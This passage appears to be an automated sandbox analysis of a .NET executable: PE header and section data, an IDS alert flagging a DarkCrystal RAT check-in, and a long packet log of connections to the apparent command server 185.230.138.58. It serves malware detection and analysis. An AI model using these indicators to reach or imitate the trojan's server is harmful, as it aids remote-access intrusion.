                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xcf0e00x4b.text
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xd00000x370.rsrc
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xd20000xc.reloc
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                        Sections

                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                        .text0x20000xcd1340xcd200d96c410459842da5812be7e29de45280False0.42575030469226083data5.39989107936421IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                        .rsrc0xd00000x3700x400f26caf630a91f791ac067594180fd808False0.376953125data2.856785757722979IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                        .reloc0xd20000xc0x200f7e969ae63669fa6ef9760e9161817fbFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                        Resources

                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                        RT_VERSION0xd00580x318data0.44823232323232326

                                                                                                                                        Imports

                                                                                                                                        DLLImport
                                                                                                                                        mscoree.dll_CorExeMain

                                                                                                                                        Network Behavior

                                                                                                                                        Suricata IDS Alerts

                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                        2024-12-21T10:07:18.951127+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449730185.230.138.5880TCP

                                                                                                                                        Network Port Distribution

                                                                                                                                        TCP Packets

                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Dec 21, 2024 10:07:17.538918972 CET4973080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:17.658756971 CET8049730185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:17.658998013 CET4973080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:17.659485102 CET4973080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:17.779000998 CET8049730185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:18.014355898 CET4973080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:18.136169910 CET8049730185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:18.906742096 CET8049730185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:18.951127052 CET4973080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:18.997340918 CET8049730185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:18.997378111 CET8049730185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:18.997445107 CET4973080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:19.140192032 CET8049730185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:19.185499907 CET4973080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:19.211906910 CET4973080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:19.331625938 CET8049730185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:19.560597897 CET4973080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:19.583532095 CET4973280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:19.605874062 CET8049730185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:19.654252052 CET4973080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:19.680418015 CET8049730185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:19.703290939 CET8049732185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:19.703383923 CET4973280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:19.703550100 CET4973280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:19.823124886 CET8049732185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:19.968040943 CET8049730185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:20.004260063 CET4973080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:20.060662985 CET4973280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:20.124152899 CET8049730185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:20.180624008 CET8049732185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:20.357543945 CET4973080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:20.398052931 CET8049730185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:20.451138973 CET4973080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:20.477149963 CET8049730185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:20.477204084 CET8049730185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:20.884708881 CET8049730185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:20.935511112 CET4973080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:20.948527098 CET8049732185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:20.998085976 CET4973280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:21.188690901 CET8049732185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:21.232388973 CET4973280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:21.354507923 CET4973080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:21.354983091 CET4973380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:21.360723972 CET4973280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:21.475769997 CET8049733185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:21.475855112 CET4973380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:21.475862026 CET8049730185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:21.479017973 CET4973080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:21.479310989 CET4973380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:21.480928898 CET8049732185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:21.481045961 CET4973280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:21.599167109 CET8049733185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:21.844502926 CET4973380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:21.964339018 CET8049733185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:22.725459099 CET8049733185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:22.873050928 CET4973380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:22.960261106 CET8049733185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:23.163167953 CET4973380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:23.326603889 CET4973880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:23.446321011 CET8049738185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:23.447690964 CET4973880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:23.447896957 CET4973880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:23.567420006 CET8049738185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:23.795291901 CET4973880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:23.914918900 CET8049738185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:24.469471931 CET4973380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:24.710853100 CET8049738185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:24.873050928 CET4973880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:24.948200941 CET8049738185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:25.076409101 CET4973880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:25.899852991 CET4974180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:25.904546022 CET4973880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:26.019821882 CET8049741185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:26.019956112 CET4974180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:26.020102978 CET4974180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:26.024655104 CET8049738185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:26.024735928 CET4973880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:26.140028954 CET8049741185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:26.373260021 CET4974180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:26.493249893 CET8049741185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:26.493356943 CET8049741185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:27.265108109 CET8049741185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:27.460953951 CET4974180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:27.502410889 CET8049741185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:27.576174974 CET4974180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:28.977983952 CET4974180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:28.978502035 CET4974380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:29.097968102 CET8049741185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:29.098066092 CET4974180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:29.098277092 CET8049743185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:29.098401070 CET4974380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:29.098659039 CET4974380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:29.218173027 CET8049743185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:29.451376915 CET4974380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:29.571309090 CET8049743185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:30.347369909 CET8049743185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:30.577910900 CET4974380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:30.581536055 CET8049743185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:30.767417908 CET4974380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:30.931031942 CET4974380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:31.021351099 CET4974680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:31.051248074 CET8049743185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:31.051402092 CET4974380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:31.140908957 CET8049746185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:31.141032934 CET4974680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:31.141233921 CET4974680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:31.261339903 CET8049746185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:31.498167038 CET4974680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:31.618676901 CET8049746185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:32.388468981 CET8049746185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:32.482444048 CET4974680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:32.514621019 CET4974880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:32.530848980 CET4974680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:32.624193907 CET8049746185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:32.624265909 CET4974680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:32.634160995 CET8049748185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:32.634254932 CET4974880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:32.634413004 CET4974880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:32.651156902 CET8049746185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:32.651222944 CET4974680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:32.742110968 CET4974980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:32.753907919 CET8049748185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:32.861697912 CET8049749185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:32.861793041 CET4974980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:32.861941099 CET4974980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:32.981422901 CET8049749185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:32.982476950 CET4974880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:33.102160931 CET8049748185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:33.102189064 CET8049748185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:33.216869116 CET4974980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:33.336508989 CET8049749185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:33.884246111 CET8049748185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:33.982429981 CET4974880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:34.108730078 CET8049749185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:34.120567083 CET8049748185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:34.169925928 CET4974880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:34.263695002 CET4974980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:34.344594955 CET8049749185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:34.488639116 CET4974880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:34.488696098 CET4974980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:34.488992929 CET4975080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:34.618726015 CET8049748185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:34.618763924 CET8049750185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:34.618796110 CET8049749185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:34.618899107 CET4974880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:34.618942976 CET4975080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:34.618964911 CET4974980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:34.619174004 CET4975080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:34.738667965 CET8049750185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:34.966933012 CET4975080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:35.086723089 CET8049750185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:35.883424997 CET8049750185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:35.935565948 CET4975080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:36.116720915 CET8049750185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:36.171617031 CET4975080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:36.346937895 CET4975080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:36.347414970 CET4975180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:36.466958046 CET8049750185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:36.466990948 CET8049751185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:36.467066050 CET4975080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:36.467369080 CET4975180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:36.467736959 CET4975180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:36.589273930 CET8049751185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:36.846267939 CET4975180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:36.966430902 CET8049751185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:37.712363005 CET8049751185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:37.760586977 CET4975180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:37.948542118 CET8049751185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:37.998066902 CET4975180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:38.075946093 CET4975180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:38.079720974 CET4975280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:38.196386099 CET8049751185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:38.196800947 CET4975180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:38.199773073 CET8049752185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:38.200197935 CET4975280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:38.200197935 CET4975280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:38.319792986 CET8049752185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:38.483073950 CET4975280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:38.483076096 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:38.603384972 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:38.603629112 CET4975480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:38.603753090 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:38.603914022 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:38.644300938 CET8049752185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:38.723207951 CET8049754185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:38.723422050 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:38.723447084 CET4975480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:38.723447084 CET4975480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:38.843017101 CET8049754185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:38.951354980 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.071001053 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.071079016 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.071113110 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.071167946 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.071173906 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.071197987 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.071222067 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.071247101 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.071249008 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.071278095 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.071302891 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.071324110 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.071403980 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.071434975 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.071461916 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.071479082 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.071484089 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.071511984 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.071537971 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.071568012 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.076301098 CET4975480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.170639038 CET8049752185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.170695066 CET4975280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.191400051 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.191447973 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.191478014 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.191504002 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.191509008 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.191533089 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.191543102 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.191562891 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.191590071 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.196259022 CET8049754185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.232846022 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.233038902 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.352849007 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.352941990 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.404083967 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.404171944 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.516274929 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.516345978 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.574071884 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.574266911 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.636100054 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.636162996 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.694408894 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.694438934 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.694470882 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.694489956 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.694492102 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.694519997 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.694538116 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.694552898 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.694566011 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.694601059 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.694602966 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.694648027 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.694672108 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.694713116 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.694725990 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.694775105 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.694788933 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.694835901 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.694839001 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.694894075 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.694905996 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.694952011 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.694955111 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.694986105 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.695000887 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.695034027 CET4975380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:07:39.695094109 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.695137978 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.695245981 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.695278883 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.695363998 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.695441961 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.695547104 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.695574045 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.695605993 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.695698023 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.695868969 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.695897102 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.695930958 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.696044922 CET8049753185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:07:39.696151972 CET8049753185.230.138.58192.168.2.4
